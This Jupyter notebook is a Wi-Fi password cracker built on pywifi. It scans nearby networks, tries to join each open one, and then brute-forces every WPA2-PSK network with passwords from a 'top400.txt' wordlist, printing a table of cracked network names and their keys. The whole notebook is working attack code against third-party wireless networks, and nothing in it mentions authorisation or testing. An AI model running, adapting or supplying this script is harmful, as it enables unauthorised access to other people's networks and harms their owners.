In [ ]:
#!pip install comtypes
#!pip install pywifi

import time
import pywifi
from IPython.display import display, HTML
from pywifi import const

In [ ]:
available_devices = []
keys = []
final_output = {}

In [ ]:
#### Get interface information
##### In general, there will be only one Wi-Fi interface in the platform. Thus, use index 0 to obtain the Wi-Fi interface. 
### Get the name of the Wi-Fi interface.

In [ ]:
wifi = pywifi.PyWiFi()
interface = wifi.interfaces()[0]

In [ ]:
display(HTML('<h3>{}</h3>'.format(interface.name())))
#print(interface.name())

In [ ]:
display(HTML("<h3><u> Now let's scan the network.</u></h3>"))

In [ ]:
interface.scan()
#It is safer to call scan_results() 2 ~ 8 seconds later after calling scan()
#Because the scan time can be different for each Wi-Fi interface provider. 
time.sleep(5) 
### Obtain the results of the previous triggerred scan. A Profile list will be returned.
x = interface.scan_results()

In [ ]:
display(HTML("<h3><u> Let's See All Network Profiles</u></h3>"))

In [ ]:
available_devices = []
for i in x:
    available_devices.append(i.ssid)
html = '<table style="font-size:1em"><tr><th>{}</th><th style="text-align: Center">{}</th>'.format('#','SSID')
c=0
for i in available_devices:
    c+=1
    html+='<tr><td>{}</td><td style="text-align: left">{}</td></tr>'.format(c,i)
html+='</table>'
display(HTML(html))

In [ ]:
display(HTML("<h3><u> Let's See Check for open network around us.</u></h3>"))

In [ ]:
for i in available_devices:
    nm = i
    try:
        i=i.strip()
        profile = pywifi.Profile()
        profile.ssid = i
        profile.auth = const.AUTH_ALG_OPEN
        profile.akm.append(const.AKM_TYPE_NONE)
        wifi = pywifi.PyWiFi()
        iface = wifi.interfaces()[0]
        iface.remove_all_network_profiles()
        profile = iface.add_network_profile(profile)
        iface.connect(profile)
        time.sleep(4)
        print("Trying to Connect to SSID : ",i)
        if iface.status() == const.IFACE_CONNECTED:
            print('success password of the network',i,' is',"none")
            final_output[i] = ""
            available_devices.remove(nm)
    except Exception as e:
        print(e)

In [ ]:
with open('top400.txt','r') as f:
    for i in f:
        i = i.replace('\n','')
        if i not in keys:
            keys.append(i)

In [ ]:
print(keys)

In [ ]:
try:
    for i in available_devices:
        profile = pywifi.Profile()
        i=i.strip()
        profile.ssid = i
        profile.auth = const.AUTH_ALG_OPEN
        profile.akm.append(const.AKM_TYPE_WPA2PSK)
        profile.cipher = const.CIPHER_TYPE_CCMP
        flag=0
        for j in keys:
            j=j.strip()
            profile.key = j
            wifi = pywifi.PyWiFi()
            iface = wifi.interfaces()[0]
            iface.remove_all_network_profiles()
            profile = iface.add_network_profile(profile)

            iface.connect(profile)
            time.sleep(4)
            if iface.status() == const.IFACE_CONNECTED:
                print('success password of the network',i,' is',j)
                final_output[i] = j
                flag=1
                break
except Exception as e:
    print(e)
        #if flag == 0:
        #print('sorry we are not able to CRACK PASSWORD of',i)

In [ ]:
print('*'*10,'Discovered Password','*'*10)
print("{0:<18} {1:<12}".format("HOST NAME","PASSWORD"))
for SSID,Key in final_output.items():
    print ("{:<19}{:<5}".format(SSID, Key))
available_devices.clear()